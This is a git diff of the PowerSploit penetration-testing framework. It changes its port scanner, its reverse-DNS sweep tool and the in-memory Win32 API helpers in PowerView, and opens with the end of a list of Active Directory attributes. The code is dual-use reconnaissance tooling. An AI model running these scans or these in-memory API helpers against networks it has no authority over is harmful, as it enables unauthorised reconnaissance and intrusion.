"msExchMailboxMoveTargetUserBL", + "msExchMDBAvailabilityGroupConfigurationBL", + "msExchMobileRemoteDocumentsAllowedServersBL", + "msExchMobileRemoteDocumentsBlockedServersBL", + "msExchMobileRemoteDocumentsInternalDomainSuffixListBL", + "msExchMultiMailboxDatabasesBL", + "msExchMultiMailboxLocationsBL", + "msExchOABGeneratingMailboxBL", + "msExchOrganizationsAddressBookRootsBL", + "msExchOrganizationsGlobalAddressListsBL", + "msExchOrganizationsTemplateRootsBL", + "msExchOriginatingForest", + "msExchOWAAllowedFileTypesBL", + "msExchOWAAllowedMimeTypesBL", + "msExchOWABlockedFileTypesBL", + "msExchOWABlockedMIMETypesBL", + "msExchOWAForceSaveFileTypesBL", + "msExchOWAForceSaveMIMETypesBL", + "msExchOWARemoteDocumentsAllowedServersBL", + "msExchOWARemoteDocumentsBlockedServersBL", + "msExchOWARemoteDocumentsInternalDomainSuffixListBL", + "msExchOWATranscodingFileTypesBL", + "msExchOWATranscodingMimeTypesBL", + "msExchParentPlanBL", + "msExchPolicyList", + "msExchPolicyOptionList", + "msExchQueryBaseDN", + "msExchRBACPolicyBL", + "msExchResourceGUID", + "msExchResourceProperties", + "msExchRMSComputerAccountsBL", + "msExchServerAssociationBL", + "msExchServerSiteBL", + "msExchSMTPReceiveDefaultAcceptedDomainBL", + "msExchSupervisionDLBL", + "msExchSupervisionOneOffBL", + "msExchSupervisionUserBL", + "msExchTransportRuleTargetBL", + "msExchTrustedDomainBL", + "msExchUGMemberBL", + "msExchUserBL", + "msExchUserCulture", + "msIIS-FTPDir", + "msIIS-FTPRoot", + "msImaging-HashAlgorithm", + "msImaging-ThumbprintHash", + "mSMQDigests", + "mSMQDigestsMig", + "mSMQSignCertificates", + "mSMQSignCertificatesMig", + "msNPAllowDialin", + "msNPCallingStationID", + "msNPSavedCallingStationID", + "msOrg-LeadersBL", + "msPKIAccountCredentials", + "msPKI-CredentialRoamingTokens", + "msPKIDPAPIMasterKeys", + "msPKIRoamingTimeStamp", + "msRADIUSCallbackNumber", + "msRADIUS-FramedInterfaceId", + "msRADIUSFramedIPAddress", + "msRADIUS-FramedIpv6Prefix", + "msRADIUS-FramedIpv6Route", + "msRADIUSFramedRoute", + "msRADIUS-SavedFramedInterfaceId", + "msRADIUS-SavedFramedIpv6Prefix", + "msRADIUS-SavedFramedIpv6Route", + "msRADIUSServiceType", + "msRASSavedCallbackNumber", + "msRASSavedFramedIPAddress", + "msRASSavedFramedRoute", + "msRTCSIP-AcpInfo", + "msRTCSIP-ApplicationOptions", + "msRTCSIP-ArchivingEnabled", + "msRTCSIP-DeploymentLocator", + "msRTCSIP-FederationEnabled", + "msRTCSIP-GroupingID", + "msRTCSIP-InternetAccessEnabled", + "msRTCSIP-Line", + "msRTCSIP-LineServer", + "msRTCSIP-OptionFlags", + "msRTCSIP-OriginatorSid", + "msRTCSIP-OwnerUrn", + "msRTCSIP-PrimaryHomeServer", + "msRTCSIP-PrimaryUserAddress", + "msRTCSIP-PrivateLine", + "msRTCSIP-TargetHomeServer", + "msRTCSIP-TargetUserPolicies", + "msRTCSIP-TenantId", + "msRTCSIP-UserEnabled", + "msRTCSIP-UserExtension", + "msRTCSIP-UserLocationProfile", + "msRTCSIP-UserPolicies", + "msRTCSIP-UserPolicy", + "msRTCSIP-UserRoutingGroupId", + "msSFU30Aliases", + "msSFU30Name", + "msSFU30NisDomain", + "msSFU30PosixMemberOf", + "msTPM-OwnerInformation", + "msTPM-TpmInformationForComputer", + "msTSAllowLogon", + "msTSBrokenConnectionAction", + "msTSConnectClientDrives", + "msTSConnectPrinterDrives", + "msTSDefaultToMainPrinter", + "msTSEndpointData", + "msTSEndpointPlugin", + "msTSEndpointType", + "msTSExpireDate", + "msTSExpireDate2", + "msTSExpireDate3", + "msTSExpireDate4", + "msTSHomeDirectory", + "msTSHomeDrive", + "msTSInitialProgram", + "msTSLicenseVersion", + "msTSLicenseVersion2", + "msTSLicenseVersion3", + "msTSLicenseVersion4", + "msTSLSProperty01", + "msTSLSProperty02", + "msTSManagingLS", + "msTSManagingLS2", + "msTSManagingLS3", + "msTSManagingLS4", + "msTSMaxConnectionTime", + "msTSMaxDisconnectionTime", + "msTSMaxIdleTime", + "msTSPrimaryDesktop", + "msTSPrimaryDesktopBL", + "msTSProfilePath", + "msTSProperty01", + "msTSProperty02", + "msTSReconnectionAction", + "msTSRemoteControl", + "msTSSecondaryDesktopBL", + "msTSSecondaryDesktops", + "msTSWorkDirectory", + "name", + "netbootDUID", + "netbootGUID", + "netbootInitialization", + "netbootMachineFilePath", + "netbootMirrorDataFile", + "netbootSCPBL", + "netbootSIFFile", + "networkAddress", + "nisMapName", + "nonSecurityMemberBL", + "ntPwdHistory", + "nTSecurityDescriptor", + "o", + "objectCategory", + "objectClass", + "objectGUID", + "objectVersion", + "operatingSystem", + "operatingSystemHotfix", + "operatingSystemServicePack", + "operatingSystemVersion", + "operatorCount", + "otherFacsimileTelephoneNumber", + "otherHomePhone", + "otherIpPhone", + "otherLoginWorkstations", + "otherMailbox", + "otherMobile", + "otherPager", + "otherTelephone", + "otherWellKnownObjects", + "ou", + "ownerBL", + "pager", + "partialAttributeDeletionList", + "partialAttributeSet", + "personalPager", + "personalTitle", + "photo", + "physicalDeliveryOfficeName", + "physicalLocationObject", + "policyReplicationFlags", + "possibleInferiors", + "postalAddress", + "postalCode", + "postOfficeBox", + "preferredDeliveryMethod", + "preferredLanguage", + "preferredOU", + "primaryGroupID", + "primaryInternationalISDNNumber", + "primaryTelexNumber", + "profilePath", + "promoExpiration", + "proxiedObjectName", + "proxyAddresses", + "pwdLastSet", + "queryPolicyBL", + "registeredAddress", + "replPropertyMetaData", + "replUpToDateVector", + "repsFrom", + "repsTo", + "revision", + "rIDSetReferences", + "roomNumber", + "scriptPath", + "sDRightsEffective", + "secretary", + "securityProtocol", + "seeAlso", + "serialNumber", + "serverReferenceBL", + "servicePrincipalName", + "showInAdvancedViewOnly", + "siteGUID", + "siteObjectBL", + "sn", + "st", + "street", + "streetAddress", + "structuralObjectClass", + "subRefs", + "subSchemaSubEntry", + "systemFlags", + "telephoneAssistant", + "telephoneNumber", + "teletexTerminalIdentifier", + "telexNumber", + "terminalServer", + "thumbnailLogo", + "thumbnailPhoto", + "title", + "trackingLogPathName", + "type", + "uid", + "unicodePwd", + "url", + "userAccountControl", + "userCertificate", + "userParameters", + "userPassword", + "userPKCS12", + "userPrincipalName", + "userSharedFolder", + "userSharedFolderOther", + "userSMIMECertificate", + "userWorkstations", + "uSNChanged", + "uSNCreated", + "uSNDSALastObjRemoved", + "USNIntersite", + "uSNLastObjRem", + "uSNSource", + "volumeCount", + "wbemPath", + "wellKnownObjects", + "whenChanged", + "whenCreated", + "wWWHomePage", + "x121Address", + "x500uniqueIdentifier" + ) + $Compare = Compare-Object -ReferenceObject $ComputerAttributeList -DifferenceObject $ComputerAttributeListFromAD + Write-Output $Compare + } + } +} + \ No newline at end of file diff --git a/Recon/Invoke-Portscan.ps1 b/Recon/Invoke-Portscan.ps1 index 6f059e25..ce76088e 100644 --- a/Recon/Invoke-Portscan.ps1 +++ b/Recon/Invoke-Portscan.ps1 @@ -5,11 +5,11 @@ function Invoke-Portscan Simple portscan module -PowerSploit Function: Invoke-Portscan -Author: Rich Lundeen (http://webstersProdigy.net) -License: BSD 3-Clause -Required Dependencies: None -Optional Dependencies: None +PowerSploit Function: Invoke-Portscan +Author: Rich Lundeen (http://webstersProdigy.net) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None .DESCRIPTION @@ -114,7 +114,7 @@ Force Overwrite if output Files exist. Otherwise it throws exception .EXAMPLE -C:\PS> Invoke-Portscan -Hosts "webstersprodigy.net,google.com,microsoft.com" -TopPorts 50 +Invoke-Portscan -Hosts "webstersprodigy.net,google.com,microsoft.com" -TopPorts 50 Description ----------- @@ -122,7 +122,7 @@ Scans the top 50 ports for hosts found for webstersprodigy.net,google.com, and m .EXAMPLE -C:\PS> echo webstersprodigy.net | Invoke-Portscan -oG test.gnmap -f -ports "80,443,8080" +echo webstersprodigy.net | Invoke-Portscan -oG test.gnmap -f -ports "80,443,8080" Description ----------- @@ -130,7 +130,7 @@ Does a portscan of "webstersprodigy.net", and writes a greppable output file .EXAMPLE -C:\PS> Invoke-Portscan -Hosts 192.168.1.1/24 -T 4 -TopPorts 25 -oA localnet +Invoke-Portscan -Hosts 192.168.1.1/24 -T 4 -TopPorts 25 -oA localnet Description ----------- @@ -141,7 +141,13 @@ Scans the top 20 ports for hosts found in the 192.168.1.1/24 range, outputs all http://webstersprodigy.net #> - [CmdletBinding()]Param ( + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseSingularNouns', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseApprovedVerbs', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseLiteralInitializerForHashtable', '')] + [CmdletBinding()] + Param ( #Host, Ports [Parameter(ParameterSetName="cmdHosts", @@ -256,6 +262,8 @@ http://webstersprodigy.net [String[]] $iHosts = $Hosts.Split(",") + $IPRangeRegex = "\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}-\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}" + foreach($iHost in $iHosts) { $iHost = $iHost.Replace(" ", "") @@ -309,6 +317,65 @@ http://webstersprodigy.net } + } + + if($iHost -match $IPRangeRegex) + { + + $iHostPart1 = ($iHost.Split("-"))[0] + $iHostPart2 = ($iHost.Split("-"))[1] + + $LowerBound = $iHostPart1.Split(".") + $UpperBound = $iHostPart2.Split(".") + + $LowerBoundInt = ($LowerBound[0].ToInt32($null),$LowerBound[1].ToInt32($null),$LowerBound[2].ToInt32($null),$LowerBound[3].ToInt32($null)) + $UpperBoundInt = ($UpperBound[0].ToInt32($null),$UpperBound[1].ToInt32($null),$UpperBound[2].ToInt32($null),$UpperBound[3].ToInt32($null)) + + $CurrentIP = $LowerBoundInt + $CurrentIPString = $null + $ControlArray = @(0,0,0,0) + + $null = $hostList.Add($iHostPart1) + + while($CurrentIPString -ne $iHostPart2) + { + for($i=0;$i -lt 4;$i++) + { + + if(($CurrentIP[$i] -eq $UpperBoundInt[$i]) -and (($i -eq 0) -or $ControlArray[$i-1] -eq 1)) + { + $ControlArray[$i] = 1 + continue + } + else + { + + $Max = 254 + if(($i -ne 0) -and ($ControlArray[$i-1] -eq 1)) + { + $Max = $UpperBoundInt[$i] + } + + if(($i -ne 3) -and ($CurrentIP[$i+1] -eq 254)) + { + $CurrentIP[$i]++ + $CurrentIP[$i+1]=0 + + $CurrentIPString = ($CurrentIP[0].ToString() + "." + $CurrentIP[1].ToString() + "." + $CurrentIP[2].ToString() + "." + $CurrentIP[3].ToString()) + $null = $hostList.Add($CurrentIPString) + } + + if(($i -eq 3) -and ($CurrentIP[$i] -lt $Max)) + { + $CurrentIP[$i]++ + + $CurrentIPString = ($CurrentIP[0].ToString() + "." + $CurrentIP[1].ToString() + "." + $CurrentIP[2].ToString() + "." + $CurrentIP[3].ToString()) + $null = $hostList.Add($CurrentIPString) + } + } + } + } + } else { @@ -748,9 +815,9 @@ http://webstersprodigy.net #TODO deal with output Write-PortscanOut -comment $startMsg -grepStream $grepStream -xmlStream $xmlStream -readableStream $readableStream - #converting back from int array gives some argument error checking - $sPortList = [string]::join(",", $portList) - $sHostPortList = [string]::join(",", $hostPortList) + # #converting back from int array gives some argument error checking + # $sPortList = [string]::join(",", $portList) + # $sHostPortList = [string]::join(",", $hostPortList) ######## #Port Scan Code - run on a per host basis @@ -840,7 +907,6 @@ http://webstersprodigy.net $sockets[$p] = new-object System.Net.Sockets.TcpClient } - $scriptBlockAsString = @" #somewhat of a race condition with the timeout, but I don't think it matters @@ -885,8 +951,7 @@ http://webstersprodigy.net $timeouts[$p].Enabled = $true $myscriptblock = [scriptblock]::Create($scriptBlockAsString) - $x = $sockets[$p].beginConnect($h, $p,(New-ScriptBlockCallback($myscriptblock)) , $null) - + $Null = $sockets[$p].beginConnect($h, $p,(New-ScriptBlockCallback($myscriptblock)) , $null) } function PortScan-Alive diff --git a/Recon/Invoke-ReverseDnsLookup.ps1 b/Recon/Invoke-ReverseDnsLookup.ps1 index 5e811eed..36e63987 100644 --- a/Recon/Invoke-ReverseDnsLookup.ps1 +++ b/Recon/Invoke-ReverseDnsLookup.ps1 @@ -5,23 +5,23 @@ function Invoke-ReverseDnsLookup Perform a reverse DNS lookup scan on a range of IP addresses. -PowerSploit Function: Invoke-ReverseDnsLookup -Author: Matthew Graeber (@mattifestation) -License: BSD 3-Clause -Required Dependencies: None -Optional Dependencies: None - +PowerSploit Function: Invoke-ReverseDnsLookup +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + .DESCRIPTION -Invoke-ReverseDnsLookup scans an IP address range for DNS PTR records. This script is useful for performing DNS reconnaisance prior to conducting an authorized penetration test. - +Invoke-ReverseDnsLookup scans an IP address range for DNS PTR records. This script is useful for performing DNS reconnaissance prior to conducting an authorized penetration test. + .PARAMETER IPRange Specifies the IP address range. The range provided can be in the form of a single IP address, a low-high range, or a CIDR range. Comma-delimited ranges may can be provided. - + .EXAMPLE -C:\PS> Invoke-ReverseDnsLookup 74.125.228.0/29 +Invoke-ReverseDnsLookup 74.125.228.0/29 IP HostName -- -------- @@ -31,29 +31,29 @@ IP HostName 74.125.228.4 iad23s05-in-f4.1e100.net 74.125.228.5 iad23s05-in-f5.1e100.net 74.125.228.6 iad23s05-in-f6.1e100.net - + Description ----------- Returns the hostnames of the IP addresses specified by the CIDR range. - + .EXAMPLE -C:\PS> Invoke-ReverseDnsLookup '74.125.228.1,74.125.228.4-74.125.228.6' - +Invoke-ReverseDnsLookup '74.125.228.1,74.125.228.4-74.125.228.6' + IP HostName -- -------- 74.125.228.1 iad23s05-in-f1.1e100.net 74.125.228.4 iad23s05-in-f4.1e100.net 74.125.228.5 iad23s05-in-f5.1e100.net 74.125.228.6 iad23s05-in-f6.1e100.net - + Description ----------- Returns the hostnames of the IP addresses specified by the IP range specified. .EXAMPLE -PS C:\> Write-Output "74.125.228.1,74.125.228.0/29" | Invoke-ReverseDnsLookup +Write-Output "74.125.228.1,74.125.228.0/29" | Invoke-ReverseDnsLookup IP HostName -- -------- @@ -69,13 +69,15 @@ Description ----------- Returns the hostnames of the IP addresses piped from another source. - .LINK http://www.exploit-monday.com https://github.com/mattifestation/PowerSploit #> + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseApprovedVerbs', '')] + [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True,ValueFromPipeline=$True)] [String] @@ -83,14 +85,14 @@ https://github.com/mattifestation/PowerSploit ) BEGIN { - + function Parse-IPList ([String] $IpRange) { - + function IPtoInt { Param([String] $IpString) - + $Hexstr = "" $Octets = $IpString.Split(".") foreach ($Octet in $Octets) { @@ -98,7 +100,7 @@ https://github.com/mattifestation/PowerSploit } return [Convert]::ToInt64($Hexstr, 16) } - + function InttoIP { Param([Int64] $IpInt) @@ -110,15 +112,15 @@ https://github.com/mattifestation/PowerSploit } return $IpStr.TrimEnd('.') } - + $Ip = [System.Net.IPAddress]::Parse("127.0.0.1") - + foreach ($Str in $IpRange.Split(",")) { $Item = $Str.Trim() $Result = "" $IpRegex = "\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}" - + # First, validate the input switch -regex ($Item) { @@ -139,11 +141,11 @@ https://github.com/mattifestation/PowerSploit } default { - Write-Warning "Inproper input" + Write-Warning "Improper input" return } } - + #Now, start processing the IP addresses switch ($Result) { @@ -152,14 +154,14 @@ https://github.com/mattifestation/PowerSploit $CidrRange = $Item.Split("/") $Network = $CidrRange[0] $Mask = $CidrRange[1] - + if (!([System.Net.IPAddress]::TryParse($Network, [ref] $Ip))) { Write-Warning "Invalid IP address supplied!"; return} if (($Mask -lt 0) -or ($Mask -gt 30)) { Write-Warning "Invalid network mask! Acceptable values are 0-30"; return} - + $BinaryIP = [Convert]::ToString((IPtoInt $Network),2).PadLeft(32,'0') #Generate lower limit (Excluding network address) $Lower = $BinaryIP.Substring(0, $Mask) + "0" * ((32-$Mask)-1) + "1" - #Generate upperr limit (Excluding broadcast address) + #Generate upper limit (Excluding broadcast address) $Upper = $BinaryIP.Substring(0, $Mask) + "1" * ((32-$Mask)-1) + "0" $LowerInt = [Convert]::ToInt64($Lower, 2) $UpperInt = [Convert]::ToInt64($Upper, 2) @@ -168,21 +170,21 @@ https://github.com/mattifestation/PowerSploit "range" { $Range = $item.Split("-") - + if ([System.Net.IPAddress]::TryParse($Range[0],[ref]$Ip)) { $Temp1 = $Ip } else { Write-Warning "Invalid IP address supplied!"; return } - + if ([System.Net.IPAddress]::TryParse($Range[1],[ref]$Ip)) { $Temp2 = $Ip } else { Write-Warning "Invalid IP address supplied!"; return } - + $Left = (IPtoInt $Temp1.ToString()) $Right = (IPtoInt $Temp2.ToString()) - + if ($Right -gt $Left) { for ($i = $Left; $i -le $Right; $i++) { InttoIP $i } } else { Write-Warning "Invalid IP range. The right portion must be greater than the left portion."; return} - + break } "single" @@ -193,28 +195,30 @@ https://github.com/mattifestation/PowerSploit } default { - Write-Warning "An error occured." + Write-Warning "An error occurred." return } } } - } } - + PROCESS { Parse-IPList $IpRange | ForEach-Object { try { Write-Verbose "Resolving $_" $Temp = [System.Net.Dns]::GetHostEntry($_) - + $Result = @{ IP = $_ HostName = $Temp.HostName } - + New-Object PSObject -Property $Result - } catch [System.Net.Sockets.SocketException] {} + } + catch [System.Net.Sockets.SocketException] { + Write-Verbose "Error: $_" + } } } } diff --git a/Recon/PowerView.ps1 b/Recon/PowerView.ps1 index d35a9f02..2dc5234a 100755 --- a/Recon/PowerView.ps1 +++ b/Recon/PowerView.ps1 @@ -2,14 +2,14 @@ <# - PowerSploit File: PowerView.ps1 - Author: Will Schroeder (@harmj0y) - License: BSD 3-Clause - Required Dependencies: None - Optional Dependencies: None +PowerSploit File: PowerView.ps1 +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None #> + ######################################################## # # PSReflect code for Windows API access @@ -18,53 +18,54 @@ # ######################################################## -function New-InMemoryModule -{ +function New-InMemoryModule { <# - .SYNOPSIS +.SYNOPSIS - Creates an in-memory assembly and module +Creates an in-memory assembly and module - Author: Matthew Graeber (@mattifestation) - License: BSD 3-Clause - Required Dependencies: None - Optional Dependencies: None +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None - .DESCRIPTION +.DESCRIPTION - When defining custom enums, structs, and unmanaged functions, it is - necessary to associate to an assembly module. This helper function - creates an in-memory module that can be passed to the 'enum', - 'struct', and Add-Win32Type functions. +When defining custom enums, structs, and unmanaged functions, it is +necessary to associate to an assembly module. This helper function +creates an in-memory module that can be passed to the 'enum', +'struct', and Add-Win32Type functions. - .PARAMETER ModuleName +.PARAMETER ModuleName - Specifies the desired name for the in-memory assembly and module. If - ModuleName is not provided, it will default to a GUID. +Specifies the desired name for the in-memory assembly and module. If +ModuleName is not provided, it will default to a GUID. - .EXAMPLE +.EXAMPLE - $Module = New-InMemoryModule -ModuleName Win32 +$Module = New-InMemoryModule -ModuleName Win32 #> - Param - ( + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] + [CmdletBinding()] + Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ModuleName = [Guid]::NewGuid().ToString() ) - $LoadedAssemblies = [AppDomain]::CurrentDomain.GetAssemblies() + $AppDomain = [Reflection.Assembly].Assembly.GetType('System.AppDomain').GetProperty('CurrentDomain').GetValue($null, @()) + $LoadedAssemblies = $AppDomain.GetAssemblies() - ForEach ($Assembly in $LoadedAssemblies) { + foreach ($Assembly in $LoadedAssemblies) { if ($Assembly.FullName -and ($Assembly.FullName.Split(',')[0] -eq $ModuleName)) { return $Assembly } } $DynAssembly = New-Object Reflection.AssemblyName($ModuleName) - $Domain = [AppDomain]::CurrentDomain + $Domain = $AppDomain $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, 'Run') $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule($ModuleName, $False) @@ -74,16 +75,14 @@ function New-InMemoryModule # A helper function used to reduce typing while defining function # prototypes for Add-Win32Type. -function func -{ - Param - ( +function func { + Param ( [Parameter(Position = 0, Mandatory = $True)] [String] $DllName, [Parameter(Position = 1, Mandatory = $True)] - [String] + [string] $FunctionName, [Parameter(Position = 2, Mandatory = $True)] @@ -102,6 +101,9 @@ function func [Runtime.InteropServices.CharSet] $Charset, + [String] + $EntryPoint, + [Switch] $SetLastError ) @@ -116,6 +118,7 @@ function func if ($NativeCallingConvention) { $Properties['NativeCallingConvention'] = $NativeCallingConvention } if ($Charset) { $Properties['Charset'] = $Charset } if ($SetLastError) { $Properties['SetLastError'] = $SetLastError } + if ($EntryPoint) { $Properties['EntryPoint'] = $EntryPoint } New-Object PSObject -Property $Properties } @@ -124,123 +127,133 @@ function func function Add-Win32Type { <# - .SYNOPSIS +.SYNOPSIS + +Creates a .NET type for an unmanaged Win32 function. - Creates a .NET type for an unmanaged Win32 function. +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: func - Author: Matthew Graeber (@mattifestation) - License: BSD 3-Clause - Required Dependencies: None - Optional Dependencies: func +.DESCRIPTION - .DESCRIPTION +Add-Win32Type enables you to easily interact with unmanaged (i.e. +Win32 unmanaged) functions in PowerShell. After providing +Add-Win32Type with a function signature, a .NET type is created +using reflection (i.e. csc.exe is never called like with Add-Type). - Add-Win32Type enables you to easily interact with unmanaged (i.e. - Win32 unmanaged) functions in PowerShell. After providing - Add-Win32Type with a function signature, a .NET type is created - using reflection (i.e. csc.exe is never called like with Add-Type). +The 'func' helper function can be used to reduce typing when defining +multiple function definitions. - The 'func' helper function can be used to reduce typing when defining - multiple function definitions. +.PARAMETER DllName - .PARAMETER DllName +The name of the DLL. - The name of the DLL. +.PARAMETER FunctionName - .PARAMETER FunctionName +The name of the target function. - The name of the target function. +.PARAMETER EntryPoint - .PARAMETER ReturnType +The DLL export function name. This argument should be specified if the +specified function name is different than the name of the exported +function. - The return type of the function. +.PARAMETER ReturnType - .PARAMETER ParameterTypes +The return type of the function. - The function parameters. +.PARAMETER ParameterTypes - .PARAMETER NativeCallingConvention +The function parameters. - Specifies the native calling convention of the function. Defaults to - stdcall. +.PARAMETER NativeCallingConvention - .PARAMETER Charset +Specifies the native calling convention of the function. Defaults to +stdcall. - If you need to explicitly call an 'A' or 'W' Win32 function, you can - specify the character set. +.PARAMETER Charset - .PARAMETER SetLastError +If you need to explicitly call an 'A' or 'W' Win32 function, you can +specify the character set. - Indicates whether the callee calls the SetLastError Win32 API - function before returning from the attributed method. +.PARAMETER SetLastError - .PARAMETER Module +Indicates whether the callee calls the SetLastError Win32 API +function before returning from the attributed method. - The in-memory module that will host the functions. Use - New-InMemoryModule to define an in-memory module. +.PARAMETER Module - .PARAMETER Namespace +The in-memory module that will host the functions. Use +New-InMemoryModule to define an in-memory module. - An optional namespace to prepend to the type. Add-Win32Type defaults - to a namespace consisting only of the name of the DLL. +.PARAMETER Namespace - .EXAMPLE +An optional namespace to prepend to the type. Add-Win32Type defaults +to a namespace consisting only of the name of the DLL. - $Mod = New-InMemoryModule -ModuleName Win32 +.EXAMPLE + +$Mod = New-InMemoryModule -ModuleName Win32 - $FunctionDefinitions = @( - (func kernel32 GetProcAddress ([IntPtr]) @([IntPtr], [String]) -Charset Ansi -SetLastError), - (func kernel32 GetModuleHandle ([Intptr]) @([String]) -SetLastError), - (func ntdll RtlGetCurrentPeb ([IntPtr]) @()) - ) +$FunctionDefinitions = @( + (func kernel32 GetProcAddress ([IntPtr]) @([IntPtr], [String]) -Charset Ansi -SetLastError), + (func kernel32 GetModuleHandle ([Intptr]) @([String]) -SetLastError), + (func ntdll RtlGetCurrentPeb ([IntPtr]) @()) +) - $Types = $FunctionDefinitions | Add-Win32Type -Module $Mod -Namespace 'Win32' - $Kernel32 = $Types['kernel32'] - $Ntdll = $Types['ntdll'] - $Ntdll::RtlGetCurrentPeb() - $ntdllbase = $Kernel32::GetModuleHandle('ntdll') - $Kernel32::GetProcAddress($ntdllbase, 'RtlGetCurrentPeb') +$Types = $FunctionDefinitions | Add-Win32Type -Module $Mod -Namespace 'Win32' +$Kernel32 = $Types['kernel32'] +$Ntdll = $Types['ntdll'] +$Ntdll::RtlGetCurrentPeb() +$ntdllbase = $Kernel32::GetModuleHandle('ntdll') +$Kernel32::GetProcAddress($ntdllbase, 'RtlGetCurrentPeb') - .NOTES +.NOTES - Inspired by Lee Holmes' Invoke-WindowsApi http://poshcode.org/2189 +Inspired by Lee Holmes' Invoke-WindowsApi http://poshcode.org/2189 - When defining multiple function prototypes, it is ideal to provide - Add-Win32Type with an array of function signatures. That way, they - are all incorporated into the same in-memory module. +When defining multiple function prototypes, it is ideal to provide +Add-Win32Type with an array of function signatures. That way, they +are all incorporated into the same in-memory module. #> [OutputType([Hashtable])] Param( - [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)] + [Parameter(Mandatory=$True, ValueFromPipelineByPropertyName=$True)] [String] $DllName, - [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)] + [Parameter(Mandatory=$True, ValueFromPipelineByPropertyName=$True)] [String] $FunctionName, - [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)] + [Parameter(ValueFromPipelineByPropertyName=$True)] + [String] + $EntryPoint, + + [Parameter(Mandatory=$True, ValueFromPipelineByPropertyName=$True)] [Type] $ReturnType, - [Parameter(ValueFromPipelineByPropertyName = $True)] + [Parameter(ValueFromPipelineByPropertyName=$True)] [Type[]] $ParameterTypes, - [Parameter(ValueFromPipelineByPropertyName = $True)] + [Parameter(ValueFromPipelineByPropertyName=$True)] [Runtime.InteropServices.CallingConvention] $NativeCallingConvention = [Runtime.InteropServices.CallingConvention]::StdCall, - [Parameter(ValueFromPipelineByPropertyName = $True)] + [Parameter(ValueFromPipelineByPropertyName=$True)] [Runtime.InteropServices.CharSet] $Charset = [Runtime.InteropServices.CharSet]::Auto, - [Parameter(ValueFromPipelineByPropertyName = $True)] + [Parameter(ValueFromPipelineByPropertyName=$True)] [Switch] $SetLastError, - [Parameter(Mandatory = $True)] + [Parameter(Mandatory=$True)] [ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})] $Module, @@ -290,11 +303,11 @@ function Add-Win32Type # Make each ByRef parameter an Out parameter $i = 1 - ForEach($Parameter in $ParameterTypes) + foreach($Parameter in $ParameterTypes) { if ($Parameter.IsByRef) { - [void] $Method.DefineParameter($i, 'Out', $Null) + [void] $Method.DefineParameter($i, 'Out', $null) } $i++ @@ -304,14 +317,23 @@ function Add-Win32Type $SetLastErrorField = $DllImport.GetField('SetLastError') $CallingConventionField = $DllImport.GetField('CallingConvention') $CharsetField = $DllImport.GetField('CharSet') + $EntryPointField = $DllImport.GetField('EntryPoint') if ($SetLastError) { $SLEValue = $True } else { $SLEValue = $False } + if ($PSBoundParameters['EntryPoint']) { $ExportedFuncName = $EntryPoint } else { $ExportedFuncName = $FunctionName } + # Equivalent to C# version of [DllImport(DllName)] $Constructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor([String]) $DllImportAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($Constructor, $DllName, [Reflection.PropertyInfo[]] @(), [Object[]] @(), - [Reflection.FieldInfo[]] @($SetLastErrorField, $CallingConventionField, $CharsetField), - [Object[]] @($SLEValue, ([Runtime.InteropServices.CallingConvention] $NativeCallingConvention), ([Runtime.InteropServices.CharSet] $Charset))) + [Reflection.FieldInfo[]] @($SetLastErrorField, + $CallingConventionField, + $CharsetField, + $EntryPointField), + [Object[]] @($SLEValue, + ([Runtime.InteropServices.CallingConvention] $NativeCallingConvention), + ([Runtime.InteropServices.CharSet] $Charset), + $ExportedFuncName)) $Method.SetCustomAttribute($DllImportAttribute) } @@ -326,7 +348,7 @@ function Add-Win32Type $ReturnTypes = @{} - ForEach ($Key in $TypeHash.Keys) + foreach ($Key in $TypeHash.Keys) { $Type = $TypeHash[$Key].CreateType() @@ -338,90 +360,88 @@ function Add-Win32Type } -function psenum -{ +function psenum { <# - .SYNOPSIS +.SYNOPSIS - Creates an in-memory enumeration for use in your PowerShell session. +Creates an in-memory enumeration for use in your PowerShell session. - Author: Matthew Graeber (@mattifestation) - License: BSD 3-Clause - Required Dependencies: None - Optional Dependencies: None - - .DESCRIPTION +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None - The 'psenum' function facilitates the creation of enums entirely in - memory using as close to a "C style" as PowerShell will allow. +.DESCRIPTION - .PARAMETER Module +The 'psenum' function facilitates the creation of enums entirely in +memory using as close to a "C style" as PowerShell will allow. - The in-memory module that will host the enum. Use - New-InMemoryModule to define an in-memory module. +.PARAMETER Module - .PARAMETER FullName +The in-memory module that will host the enum. Use +New-InMemoryModule to define an in-memory module. - The fully-qualified name of the enum. +.PARAMETER FullName - .PARAMETER Type +The fully-qualified name of the enum. - The type of each enum element. +.PARAMETER Type - .PARAMETER EnumElements +The type of each enum element. - A hashtable of enum elements. +.PARAMETER EnumElements - .PARAMETER Bitfield +A hashtable of enum elements. - 